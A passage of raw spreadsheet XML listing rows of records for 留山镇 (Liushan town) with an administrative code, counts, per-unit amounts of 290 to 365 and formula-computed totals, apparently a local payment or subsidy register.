        <v>4113210399</v>
      </c>
      <c r="G1238" s="24">
        <v>3</v>
      </c>
      <c r="H1238" s="25">
        <v>290</v>
      </c>
      <c r="I1238" s="24">
        <f t="shared" si="19"/>
        <v>870</v>
      </c>
      <c r="J1238" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1238" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1239" customHeight="1" spans="1:11">
      <c r="A1239" s="23" t="s">
        <v>3326</v>
      </c>
      <c r="B1239" s="24" t="str">
        <f>B1238</f>
        <v>留山镇</v>
      </c>
      <c r="C1239" s="24" t="str">
        <f>C1238</f>
        <v>留山镇</v>
      </c>
      <c r="D1239" s="23" t="s">
        <v>3327</v>
      </c>
      <c r="E1239" s="23" t="s">
        <v>3328</v>
      </c>
      <c r="F1239" s="24">
        <f>F1238</f>
        <v>4113210399</v>
      </c>
      <c r="G1239" s="24"/>
      <c r="H1239" s="24"/>
      <c r="I1239" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1239" s="24"/>
      <c r="K1239" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1240" customHeight="1" spans="1:11">
      <c r="A1240" s="23" t="s">
        <v>3329</v>
      </c>
      <c r="B1240" s="24" t="str">
        <f>B1239</f>
        <v>留山镇</v>
      </c>
      <c r="C1240" s="24" t="str">
        <f>C1239</f>
        <v>留山镇</v>
      </c>
      <c r="D1240" s="23" t="s">
        <v>3330</v>
      </c>
      <c r="E1240" s="23" t="s">
        <v>3331</v>
      </c>
      <c r="F1240" s="24">
        <f>F1239</f>
        <v>4113210399</v>
      </c>
      <c r="G1240" s="24"/>
      <c r="H1240" s="24"/>
      <c r="I1240" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1240" s="24"/>
      <c r="K1240" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1241" customHeight="1" spans="1:11">
      <c r="A1241" s="23" t="s">
        <v>3332</v>
      </c>
      <c r="B1241" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1241" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1241" s="24" t="s">
        <v>3333</v>
      </c>
      <c r="E1241" s="24" t="s">
        <v>3320</v>
      </c>
      <c r="F1241" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1241" s="24">
        <v>1</v>
      </c>
      <c r="H1241" s="25">
        <v>365</v>
      </c>
      <c r="I1241" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1241" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1241" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1242" customHeight="1" spans="1:11">
      <c r="A1242" s="23" t="s">
        <v>3334</v>
      </c>
      <c r="B1242" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1242" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1242" s="24" t="s">
        <v>3335</v>
      </c>
      <c r="E1242" s="24" t="s">
        <v>3325</v>
      </c>
      <c r="F1242" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1242" s="24">
        <v>1</v>
      </c>
      <c r="H1242" s="25">
        <v>365</v>
      </c>
      <c r="I1242" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1242" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1242" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1243" customHeight="1" spans="1:11">
      <c r="A1243" s="23" t="s">
        <v>3336</v>
      </c>
      <c r="B1243" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1243" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1243" s="24" t="s">
        <v>3337</v>
      </c>
      <c r="E1243" s="24" t="s">
        <v>3338</v>
      </c>
      <c r="F1243" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1243" s="24">
        <v>1</v>
      </c>
      <c r="H1243" s="25">
        <v>365</v>
      </c>
      <c r="I1243" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1243" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1243" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1244" customHeight="1" spans="1:11">
      <c r="A1244" s="23" t="s">
        <v>3339</v>
      </c>
      <c r="B1244" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1244" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1244" s="24" t="s">
        <v>3340</v>
      </c>
      <c r="E1244" s="24" t="s">
        <v>3341</v>
      </c>
      <c r="F1244" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1244" s="24">
        <v>1</v>
      </c>
      <c r="H1244" s="25">
        <v>365</v>
      </c>
      <c r="I1244" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1244" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1244" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1245" customHeight="1" spans="1:11">
      <c r="A1245" s="23" t="s">
        <v>3342</v>
      </c>
      <c r="B1245" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1245" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1245" s="24" t="s">
        <v>3343</v>
      </c>
      <c r="E1245" s="24" t="s">
        <v>3344</v>
      </c>
      <c r="F1245" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1245" s="24">
        <v>1</v>
      </c>
      <c r="H1245" s="25">
        <v>365</v>
      </c>
      <c r="I1245" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1245" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1245" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1246" customHeight="1" spans="1:11">
      <c r="A1246" s="23" t="s">
        <v>3345</v>
      </c>
      <c r="B1246" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1246" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1246" s="24" t="s">
        <v>3346</v>
      </c>
      <c r="E1246" s="24" t="s">
        <v>3317</v>
      </c>
      <c r="F1246" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1246" s="24">
        <v>2</v>
      </c>
      <c r="H1246" s="25">
        <v>325</v>
      </c>
      <c r="I1246" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1246" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1246" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1247" customHeight="1" spans="1:11">
      <c r="A1247" s="23" t="s">
        <v>3347</v>
      </c>
      <c r="B1247" s="24" t="str">
        <f>B1246</f>
        <v>留山镇</v>
      </c>
      <c r="C1247" s="24" t="str">
        <f>C1246</f>
        <v>留山镇</v>
      </c>
      <c r="D1247" s="23" t="s">
        <v>3348</v>
      </c>
      <c r="E1247" s="23" t="s">
        <v>3349</v>
      </c>
      <c r="F1247" s="24">
        <f>F1246</f>
        <v>4113210399</v>
      </c>
      <c r="G1247" s="24"/>
      <c r="H1247" s="24"/>
      <c r="I1247" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1247" s="24"/>
      <c r="K1247" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1248" customHeight="1" spans="1:11">
      <c r="A1248" s="23" t="s">
        <v>3350</v>
      </c>
      <c r="B1248" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1248" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1248" s="24" t="s">
        <v>3351</v>
      </c>
      <c r="E1248" s="24" t="s">
        <v>3352</v>
      </c>
      <c r="F1248" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1248" s="24">
        <v>2</v>
      </c>
      <c r="H1248" s="25">
        <v>325</v>
      </c>
      <c r="I1248" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1248" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1248" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1249" customHeight="1" spans="1:11">
      <c r="A1249" s="23" t="s">
        <v>3353</v>
      </c>
      <c r="B1249" s="24" t="str">
        <f>B1248</f>
        <v>留山镇</v>
      </c>
      <c r="C1249" s="24" t="str">
        <f>C1248</f>
        <v>留山镇</v>
      </c>
      <c r="D1249" s="24" t="s">
        <v>3354</v>
      </c>
      <c r="E1249" s="23" t="s">
        <v>3355</v>
      </c>
      <c r="F1249" s="24">
        <f>F1248</f>
        <v>4113210399</v>
      </c>
      <c r="G1249" s="24"/>
      <c r="H1249" s="24"/>
      <c r="I1249" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1249" s="24"/>
      <c r="K1249" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1250" customHeight="1" spans="1:11">
      <c r="A1250" s="23" t="s">
        <v>3356</v>
      </c>
      <c r="B1250" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1250" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1250" s="24" t="s">
        <v>3357</v>
      </c>
      <c r="E1250" s="24" t="s">
        <v>3358</v>
      </c>
      <c r="F1250" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1250" s="24">
        <v>1</v>
      </c>
      <c r="H1250" s="25">
        <v>365</v>
      </c>
      <c r="I1250" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1250" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1250" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1251" customHeight="1" spans="1:11">
      <c r="A1251" s="23" t="s">
        <v>3359</v>
      </c>
      <c r="B1251" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1251" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1251" s="24" t="s">
        <v>3360</v>
      </c>
      <c r="E1251" s="24" t="s">
        <v>3209</v>
      </c>
      <c r="F1251" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1251" s="24">
        <v>1</v>
      </c>
      <c r="H1251" s="25">
        <v>365</v>
      </c>
      <c r="I1251" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1251" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1251" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1252" customHeight="1" spans="1:11">
      <c r="A1252" s="23" t="s">
        <v>3361</v>
      </c>
      <c r="B1252" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1252" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1252" s="24" t="s">
        <v>3362</v>
      </c>
      <c r="E1252" s="24" t="s">
        <v>3300</v>
      </c>
      <c r="F1252" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1252" s="24">
        <v>1</v>
      </c>
      <c r="H1252" s="25">
        <v>365</v>
      </c>
      <c r="I1252" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1252" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1252" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1253" customHeight="1" spans="1:11">
      <c r="A1253" s="23" t="s">
        <v>3363</v>
      </c>
      <c r="B1253" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1253" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1253" s="24" t="s">
        <v>3364</v>
      </c>
      <c r="E1253" s="24" t="s">
        <v>2472</v>
      </c>
      <c r="F1253" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1253" s="24">
        <v>1</v>
      </c>
      <c r="H1253" s="25">
        <v>365</v>
      </c>
      <c r="I1253" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1253" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1253" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1254" customHeight="1" spans="1:11">
      <c r="A1254" s="23" t="s">
        <v>3365</v>
      </c>
      <c r="B1254" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1254" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1254" s="24" t="s">
        <v>3366</v>
      </c>
      <c r="E1254" s="24" t="s">
        <v>3367</v>
      </c>
      <c r="F1254" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1254" s="24">
        <v>3</v>
      </c>
      <c r="H1254" s="25">
        <v>290</v>
      </c>
      <c r="I1254" s="24">
        <f t="shared" si="19"/>
        <v>870</v>
      </c>
      <c r="J1254" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1254" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1255" customHeight="1" spans="1:11">
      <c r="A1255" s="23" t="s">
        <v>3368</v>
      </c>
      <c r="B1255" s="24" t="str">
        <f>B1254</f>
        <v>留山镇</v>
      </c>
      <c r="C1255" s="24" t="str">
        <f>C1254</f>
        <v>留山镇</v>
      </c>
      <c r="D1255" s="23" t="s">
        <v>3369</v>
      </c>
      <c r="E1255" s="32" t="s">
        <v>3370</v>
      </c>
      <c r="F1255" s="24">
        <f>F1254</f>
        <v>4113210399</v>
      </c>
      <c r="G1255" s="24"/>
      <c r="H1255" s="24"/>
      <c r="I1255" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1255" s="24"/>
      <c r="K1255" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1256" customHeight="1" spans="1:11">
      <c r="A1256" s="23" t="s">
        <v>3371</v>
      </c>
      <c r="B1256" s="24" t="str">
        <f>B1255</f>
        <v>留山镇</v>
      </c>
      <c r="C1256" s="24" t="str">
        <f>C1255</f>
        <v>留山镇</v>
      </c>
      <c r="D1256" s="23" t="s">
        <v>3372</v>
      </c>
      <c r="E1256" s="23" t="s">
        <v>3373</v>
      </c>
      <c r="F1256" s="24">
        <f>F1255</f>
        <v>4113210399</v>
      </c>
      <c r="G1256" s="24"/>
      <c r="H1256" s="24"/>
      <c r="I1256" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1256" s="24"/>
      <c r="K1256" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1257" customHeight="1" spans="1:11">
      <c r="A1257" s="23" t="s">
        <v>3374</v>
      </c>
      <c r="B1257" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1257" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1257" s="24" t="s">
        <v>3375</v>
      </c>
      <c r="E1257" s="24" t="s">
        <v>3376</v>
      </c>
      <c r="F1257" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1257" s="24">
        <v>1</v>
      </c>
      <c r="H1257" s="25">
        <v>365</v>
      </c>
      <c r="I1257" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1257" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1257" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1258" customHeight="1" spans="1:11">
      <c r="A1258" s="23" t="s">
        <v>3377</v>
      </c>
      <c r="B1258" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1258" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1258" s="24" t="s">
        <v>3378</v>
      </c>
      <c r="E1258" s="24" t="s">
        <v>3379</v>
      </c>
      <c r="F1258" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1258" s="24">
        <v>1</v>
      </c>
      <c r="H1258" s="25">
        <v>365</v>
      </c>
      <c r="I1258" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1258" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1258" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1259" customHeight="1" spans="1:11">
      <c r="A1259" s="23" t="s">
        <v>3380</v>
      </c>
      <c r="B1259" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1259" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1259" s="24" t="s">
        <v>3381</v>
      </c>
      <c r="E1259" s="24" t="s">
        <v>3266</v>
      </c>
      <c r="F1259" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1259" s="24">
        <v>2</v>
      </c>
      <c r="H1259" s="25">
        <v>325</v>
      </c>
      <c r="I1259" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1259" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1259" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1260" customHeight="1" spans="1:11">
      <c r="A1260" s="23" t="s">
        <v>3382</v>
      </c>
      <c r="B1260" s="24" t="str">
        <f>B1259</f>
        <v>留山镇</v>
      </c>
      <c r="C1260" s="24" t="str">
        <f>C1259</f>
        <v>留山镇</v>
      </c>
      <c r="D1260" s="23" t="s">
        <v>3383</v>
      </c>
      <c r="E1260" s="23" t="s">
        <v>3384</v>
      </c>
      <c r="F1260" s="24">
        <f>F1259</f>
        <v>4113210399</v>
      </c>
      <c r="G1260" s="24"/>
      <c r="H1260" s="24"/>
      <c r="I1260" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1260" s="24"/>
      <c r="K1260" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1261" customHeight="1" spans="1:11">
      <c r="A1261" s="23" t="s">
        <v>3385</v>
      </c>
      <c r="B1261" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1261" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1261" s="24" t="s">
        <v>3386</v>
      </c>
      <c r="E1261" s="24" t="s">
        <v>3387</v>
      </c>
      <c r="F1261" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1261" s="24">
        <v>1</v>
      </c>
      <c r="H1261" s="25">
        <v>365</v>
      </c>
      <c r="I1261" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1261" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1261" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1262" customHeight="1" spans="1:11">
      <c r="A1262" s="23" t="s">
        <v>3388</v>
      </c>
      <c r="B1262" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1262" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1262" s="24" t="s">
        <v>3389</v>
      </c>
      <c r="E1262" s="24" t="s">
        <v>3197</v>
      </c>
      <c r="F1262" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1262" s="24">
        <v>2</v>
      </c>
      <c r="H1262" s="25">
        <v>325</v>
      </c>
      <c r="I1262" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1262" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1262" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1263" customHeight="1" spans="1:11">
      <c r="A1263" s="23" t="s">
        <v>3390</v>
      </c>
      <c r="B1263" s="24" t="str">
        <f>B1262</f>
        <v>留山镇</v>
      </c>
      <c r="C1263" s="24" t="str">
        <f>C1262</f>
        <v>留山镇</v>
      </c>
      <c r="D1263" s="23" t="s">
        <v>3391</v>
      </c>
      <c r="E1263" s="23" t="s">
        <v>3392</v>
      </c>
      <c r="F1263" s="24">
        <f>F1262</f>
        <v>4113210399</v>
      </c>
      <c r="G1263" s="24"/>
      <c r="H1263" s="24"/>
      <c r="I1263" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1263" s="24"/>
      <c r="K1263" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1264" customHeight="1" spans="1:11">
      <c r="A1264" s="23" t="s">
        <v>3393</v>
      </c>
      <c r="B1264" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1264" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1264" s="24" t="s">
        <v>3394</v>
      </c>
      <c r="E1264" s="24" t="s">
        <v>3395</v>
      </c>
      <c r="F1264" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1264" s="24">
        <v>1</v>
      </c>
      <c r="H1264" s="25">
        <v>365</v>
      </c>
      <c r="I1264" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1264" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1264" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1265" customHeight="1" spans="1:11">
      <c r="A1265" s="23" t="s">
        <v>3396</v>
      </c>
      <c r="B1265" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1265" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1265" s="24" t="s">
        <v>3397</v>
      </c>
      <c r="E1265" s="24" t="s">
        <v>3398</v>
      </c>
      <c r="F1265" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1265" s="24">
        <v>1</v>
      </c>
      <c r="H1265" s="25">
        <v>365</v>
      </c>
      <c r="I1265" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1265" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1265" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1266" customHeight="1" spans="1:11">
      <c r="A1266" s="23" t="s">
        <v>3399</v>
      </c>
      <c r="B1266" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1266" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1266" s="24" t="s">
        <v>3400</v>
      </c>
      <c r="E1266" s="24" t="s">
        <v>3206</v>
      </c>
      <c r="F1266" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1266" s="24">
        <v>2</v>
      </c>
      <c r="H1266" s="25">
        <v>325</v>
      </c>
      <c r="I1266" s="24">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J1266" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1266" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1267" customHeight="1" spans="1:11">
      <c r="A1267" s="23" t="s">
        <v>3401</v>
      </c>
      <c r="B1267" s="24" t="str">
        <f>B1266</f>
        <v>留山镇</v>
      </c>
      <c r="C1267" s="24" t="str">
        <f>C1266</f>
        <v>留山镇</v>
      </c>
      <c r="D1267" s="23" t="s">
        <v>3402</v>
      </c>
      <c r="E1267" s="23" t="s">
        <v>3236</v>
      </c>
      <c r="F1267" s="24">
        <f>F1266</f>
        <v>4113210399</v>
      </c>
      <c r="G1267" s="24"/>
      <c r="H1267" s="24"/>
      <c r="I1267" s="24">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="J1267" s="24"/>
      <c r="K1267" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1268" customHeight="1" spans="1:11">
      <c r="A1268" s="23" t="s">
        <v>3403</v>
      </c>
      <c r="B1268" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1268" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1268" s="24" t="s">
        <v>3404</v>
      </c>
      <c r="E1268" s="24" t="s">
        <v>3405</v>
      </c>
      <c r="F1268" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1268" s="24">
        <v>1</v>
      </c>
      <c r="H1268" s="25">
        <v>365</v>
      </c>
      <c r="I1268" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1268" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1268" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1269" customHeight="1" spans="1:11">
      <c r="A1269" s="23" t="s">
        <v>3406</v>
      </c>
      <c r="B1269" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1269" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1269" s="24" t="s">
        <v>3407</v>
      </c>
      <c r="E1269" s="24" t="s">
        <v>3206</v>
      </c>
      <c r="F1269" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1269" s="24">
        <v>1</v>
      </c>
      <c r="H1269" s="25">
        <v>365</v>
      </c>
      <c r="I1269" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1269" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1269" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1270" customHeight="1" spans="1:11">
      <c r="A1270" s="23" t="s">
        <v>3408</v>
      </c>
      <c r="B1270" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1270" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1270" s="24" t="s">
        <v>3409</v>
      </c>
      <c r="E1270" s="24" t="s">
        <v>3200</v>
      </c>
      <c r="F1270" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1270" s="24">
        <v>1</v>
      </c>
      <c r="H1270" s="25">
        <v>365</v>
      </c>
      <c r="I1270" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1270" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1270" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1271" customHeight="1" spans="1:11">
      <c r="A1271" s="23" t="s">
        <v>3410</v>
      </c>
      <c r="B1271" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1271" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1271" s="24" t="s">
        <v>3411</v>
      </c>
      <c r="E1271" s="24" t="s">
        <v>3412</v>
      </c>
      <c r="F1271" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1271" s="24">
        <v>1</v>
      </c>
      <c r="H1271" s="25">
        <v>365</v>
      </c>
      <c r="I1271" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1271" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1271" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1272" customHeight="1" spans="1:11">
      <c r="A1272" s="23" t="s">
        <v>3413</v>
      </c>
      <c r="B1272" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1272" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1272" s="24" t="s">
        <v>3414</v>
      </c>
      <c r="E1272" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F1272" s="24" t="s">
        <v>3415</v>
      </c>
      <c r="G1272" s="24">
        <v>1</v>
      </c>
      <c r="H1272" s="25">
        <v>365</v>
      </c>
      <c r="I1272" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1272" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1272" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1273" customHeight="1" spans="1:11">
      <c r="A1273" s="23" t="s">
        <v>3416</v>
      </c>
      <c r="B1273" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1273" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1273" s="24" t="s">
        <v>3417</v>
      </c>
      <c r="E1273" s="24" t="s">
        <v>3206</v>
      </c>
      <c r="F1273" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1273" s="24">
        <v>1</v>
      </c>
      <c r="H1273" s="25">
        <v>365</v>
      </c>
      <c r="I1273" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1273" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1273" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1274" customHeight="1" spans="1:11">
      <c r="A1274" s="23" t="s">
        <v>3418</v>
      </c>
      <c r="B1274" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1274" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="D1274" s="24" t="s">
        <v>3419</v>
      </c>
      <c r="E1274" s="24" t="s">
        <v>3420</v>
      </c>
      <c r="F1274" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1274" s="24">
        <v>1</v>
      </c>
      <c r="H1274" s="25">
        <v>365</v>
      </c>
      <c r="I1274" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1274" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1274" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1275" customHeight="1" spans="1:11">
      <c r="A1275" s="23" t="s">
        <v>3421</v>
      </c>
      <c r="B1275" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1275" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D1275" s="24" t="s">
        <v>3423</v>
      </c>
      <c r="E1275" s="24" t="s">
        <v>3424</v>
      </c>
      <c r="F1275" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1275" s="24">
        <v>1</v>
      </c>
      <c r="H1275" s="25">
        <v>365</v>
      </c>
      <c r="I1275" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1275" s="41">
        <v>45108</v>
      </c>
      <c r="K1275" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1276" customHeight="1" spans="1:11">
      <c r="A1276" s="23" t="s">
        <v>3425</v>
      </c>
      <c r="B1276" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1276" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D1276" s="24" t="s">
        <v>3426</v>
      </c>
      <c r="E1276" s="24" t="s">
        <v>3427</v>
      </c>
      <c r="F1276" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1276" s="24">
        <v>1</v>
      </c>
      <c r="H1276" s="25">
        <v>365</v>
      </c>
      <c r="I1276" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1276" s="41">
        <v>45108</v>
      </c>
      <c r="K1276" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1277" customHeight="1" spans="1:11">
      <c r="A1277" s="23" t="s">
        <v>3428</v>
      </c>
      <c r="B1277" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1277" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D1277" s="24" t="s">
